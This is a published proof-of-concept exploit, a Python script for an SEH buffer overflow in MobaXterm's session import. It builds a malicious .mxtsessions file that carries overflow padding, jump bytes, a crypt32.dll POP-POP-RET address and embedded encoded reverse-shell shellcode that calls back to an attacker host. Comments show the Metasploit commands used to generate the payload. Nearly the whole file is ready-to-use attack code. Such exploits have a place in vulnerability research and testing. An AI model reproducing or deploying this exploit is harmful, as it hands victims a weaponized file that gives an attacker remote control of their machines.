Share
# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)  
# Author: Xavi Beltran  
# Date: 2019-08-31  
# Vendor: xavibel.com  
# Vedor Page: https://mobaxterm.mobatek.net/download.html  
# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip  
# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/  
  
# Description:  
# SEH based Buffer Overflow in the Username field of a valid session  
# This exploit generates a malicious MobaXterm sessions file  
# When the user double clicks in the session, the shellcode is going to be executed  
# You need to adapt the exploit to your current OS Windows version  
  
#!/usr/bin/env python  
  
# This is not the IP address of the reverse shell  
# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach  
  
ip_address = "192.168.1.88"  
port = "22"  
  
# We are going to recreate a MobaXterm sessions file export  
print ("[+] Creating the malicious MobaXterm file...")  
sessions_file = ""  
sessions_file += "[Bookmarks]\n"  
sessions_file += "SubRep=\n"  
sessions_file += "ImgNum=42\n"  
sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"  
  
# Here is the SEH Based Buffer Overflow part  
  
# [*] Exact match at offset 16672  
# We have to substract 4 that corresponds to NSEH  
junk1 = "A" * 16668  
  
# Here we need to jump forward but EB is a bad char  
# We decrease ESP and use a conditional jump after  
# I have learned this trick in OSCE. Thank you Muts   
nseh = ""  
nseh += "\x4C" # DEC ESP  
nseh += "\x4C" # DEC ESP  
nseh += "\x77\x21" # JA SHORT 1035FE59  
  
# Using a XP-SP1 so modules are compiled without SafeSEH  
# !mona seh -cp asciiprint  
# 0x762C5042 POP-POP-RET crypt32.dll  
seh = "\x42\x50\x2C\x76"  
  
# Some padding that we are going to jump over it  
junk2 = "\x42" * 29  
  
# We recover the initial state of the stack  
alignment = ""  
alignment += "\x44" # INC ESP  
alignment += "\x44" # INC ESP  
  
  
# And we reach our shellcode  
# A0 is a badchar but the generated encoded shellcode won't use it  
# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp  
# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell  
# Shellcode 636 bytes  
shellcode = ""  
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"  
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"  
shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"  
shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"  
shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"  
shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"  
shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"  
shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"  
shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"  
shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"  
shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"  
shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"  
shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"  
shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"  
shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"  
shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"  
shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"  
shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"  
shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"  
shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"  
shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"  
shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"  
shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"  
shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"  
shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"  
shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"  
shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"  
shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"  
shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"  
shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"  
shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"  
shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"  
shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"  
shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"  
shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"  
shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"  
shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"  
shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"  
shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"  
shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"  
  
crash = junk1 + nseh + seh + junk2 + alignment + shellcode  
  
# We need to mantain the MobaXterm sessions file structure  
sessions_file += crash  
sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"  
  
# We generate the file  
f = open( 'pwnd.mxtsessions', 'w' )  
f.write(sessions_file)  
f.close()  
  
print ("[+] pwnd.mxtsessions file created!")  
print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")